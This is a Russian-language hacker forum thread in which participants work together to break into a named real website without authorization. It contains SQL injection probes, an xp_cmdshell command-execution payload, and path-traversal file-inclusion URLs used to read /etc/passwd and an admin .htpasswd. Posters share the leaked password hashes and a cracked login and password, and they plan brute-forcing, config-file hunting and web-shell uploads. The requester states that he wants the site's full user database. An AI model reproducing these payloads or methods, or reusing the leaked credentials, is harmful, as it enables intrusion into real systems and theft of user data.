вот линка _http://gibbon.kinnet.ru/theme.php?theme=2
у меня есть подозрения что там иньекция я много чего пробовал но ни в какую в чем дело помогите пожалста

Хм...теперь вопрос, с чего это у тебя такое подозрение возникло?
На все он отвечает...
An error occured.
Скули не вижу...по крайней мере пока...

ээй люди хелп ми плиззззззз

Нету там инъекции. С чего ты взял, что есть?

An error occured. вот ето почему пишет обьясните ламеру

как мне на этот сервак залезть помогите кто нить кому делать нече репы дам

Упз. Пропустил с первого раза.
http://gibbon.kinnet.ru/theme.php?theme='2'
http://gibbon.kinnet.ru/theme.php?theme=2
Вывод аналогичный, значит инъекция всё-таки есть.

An error occured. вот это почему пишет обьясните ламеру
учим английский.
An error occurred = произошла ошибка.
Теперь пораскинь мозгами и подумай, почему это пишет

_http://gibbon.kinnet.ru/theme.php?theme=3-1
_http://gibbon.kinnet.ru/theme.php?theme=2

_http://gibbon.kinnet.ru/theme.php?theme=2--

имхо иньекция есть но вывода нету...

а там ваще че нить есть помогите добры люди

']
имхо иньекция есть но вывода нету...
и че в таком случае делать?

ну вобще сюдя по этим 2 запросам
http://gibbon.kinnet.ru/theme.php?theme=2/*
http://gibbon.kinnet.ru/theme.php?theme=2--
там mssql но по всем банерам на портах там стоит nix а на nix мало кто ставит...
если mssql можно попробывать исполнить произольные команды если юзер sa что точно не так... ну и остаеться посимвольный перебор...

даже могу точно сказать та линукс
а поизвольные команды это типа какие

1';exec%20master..xp_cmdshell%20'dir%20c:\'--

это типа чтоль скуль вслепую будет ??? :(

ну вобще сюдя по этим 2 запросам
http://gibbon.kinnet.ru/theme.php?theme=2/*
http://gibbon.kinnet.ru/theme.php?theme=2--
там mssql н
Комментирование -- есть и на мускуле ;)

а как мона через эту хрень кондную строку открыть наприме или бд угнать

скорее всего БД никак не угнать. разве что попробовать посимвольный перебор какого-нить админского пасса , но это большой геморрой :)

перебор пасов сам по себе оч большой геморой
че такой сервак непреступный что ль прямо _www.microsoft.com

че ваще мне та забацать то мона ??

Тебе подсказали.
Читай доки и разбирайся сам за тебя не кто делать нечего не будет.

Незнаю, но это кажеться поинтереснее
_http://gibbon.kinnet.ru/gallerys/gallery.php?dir=

_http://gibbon.kinnet.ru/gallerys/gallery.php?dir=../../../../../../../../../etc/passwd%00

Вот вот =)
Ну и если уж идти до конца
_http://gibbon.kinnet.ru/gallerys/gallery.php?dir=../admin/.htpasswd%00

содержит
gibbon:3WEU2LkbYfCpg locky:uOW.BYqJgmVko iSpy:fA03VOgkDCQ92 gibbon:3WEU2LkbYfCpg locky:uOW.BYqJgmVko iSpy:fA03VOgkDCQ92

Ну и если уж идти до конца, то кто-то должен брутить пароли.

[/quote]Ну и если уж идти до конца, то кто-то должен брутить пароли.[quote]
Слудующий пост будет
Ну и если уж идти до конца, то кто-то должен получить рута на хостинге....
мдя ребят совсем обнаглели.

патци это как я понимаю пасы gibbon:3WEU2LkbYfCpg locky:uOW.BYqJgmVko iSpy:fA03VOgkDCQ92 gibbon:3WEU2LkbYfCpg locky:uOW.BYqJgmVko iSpy:fA03VOgkDCQ92
всем по +1

login:locky
pass: underwat

2satana8920
это хеши в DES

да я уже понял что это хеши ща как нить расщифруем тока не знаю где джона взять под вынь

satana8920
limpompo за тебя уже все сделал.

login:locky
pass: underwat

Тебе одного не хватит?

http://gibbon.kinnet.ru/gallerys/gallery.php?dir=../../index.php%00

хы )
http://webcam.kinnet.ru/

satana8920
limpompo за тебя уже все сделал.

login:locky
pass: underwat

Тебе одного не хватит?
понимаешь в чем дело друг мой мне нужна ВСЯ бд юзарей на этом сервере вот я че и парюсь

Warning: pg_exec() query failed: ERROR: Unterminated quoted string in /home/httpd/html/forum/forum.php3 on line 488

Warning: pg_numrows(): supplied argument is not a valid PostgreSQL result resource in /home/httpd/html/forum/forum.php3 on line

из-за бажного поиска форума - абсолютный путь его.... инклудимс )
http://gibbon.kinnet.ru/gallerys/gallery.php?dir=../../../httpd/html/forum/forum.php3%00

так мне БД нужна куда мне админки

ну мона впринципе на сервак че нить залить ибудет мне доступ ко всему через какой нить скрипт баговы
мона веть так чделать?

так мне БД нужна куда мне админки
обижаешь! подумай хорошенько - чем больше зацепок, тем больше шанс.
и если ты знаеш, что тебе нужно и указываешь другим, что им не нужно делать, так может быть сам сделаешь?

да ладно я молчу :Х

из-за бажного поиска форума - абсолютный путь его.... инклудимс )
http://gibbon.kinnet.ru/gallerys/gallery.php?dir=../../../httpd/html/forum/forum.php3%00
а смысл вот этого инклуда чего он нам дает то ??

Наверное фсетаки офтоп, но судя по новостям на _http://gibbon.kinnet.ru, уже даже найденные дырочки вскоре прикроют. Зря наверно подобранные пароли выложили..
Хотя конечно как показывает практика, (_4919.fatal.ru) админ может на сайт не заглядывать месяцами.

да я видел уже что доложили !
МЛЯТЬ люди нахрена
а че реально что ль админы на сайте редко бывают

дюди а мона мне шел как нить туда залить там ще php бажный напишите кто нить плиз

С помощью уже найденной уязвимость можно просматривать локальные файлы, соответственно есть маааленький шанс.
Что бы его реализовать, требуеться найти файл config'а сайта или форума, в котором прописаны пароль логин и сервер бд. А дальше, возможно пароль с логином подойдут к фтп, или доступ к бд может оказаться доступным со всех ипов, а не только с локальных.
Шансов на это мало, но они есть. Проблема в том, что неизвестна структура сайта/форума, и соответственно не известно даже названия файла с конфигами. (А мы можем просматривать исключительно файлы, с известным названием и местоположением.)
Я потыкался наобум, но конфигов не нашел.

И еще один способ - совсем левый, можно пробрутить логин/пас фтп.
Вобщем получить доступ можно, но моих возможностей на это не хватает..
Удачи, может у вас что получиться.

да я уж прям теряюсь можт через бажный php шелл залить ?! киньте инфы кому не в лом _http://gibbon.kinnet.ru/gallerys/gallery.php?=
плиз

да я уж прям теряюсь можт через бажный php шелл залить ?! киньте инфы кому не в лом _http://gibbon.kinnet.ru/gallerys/gallery.php?=
плиз

Если так нужно могу дать шелл на gibbon.kinnet.ru
Правда я не понимаю зачем он нужен. :)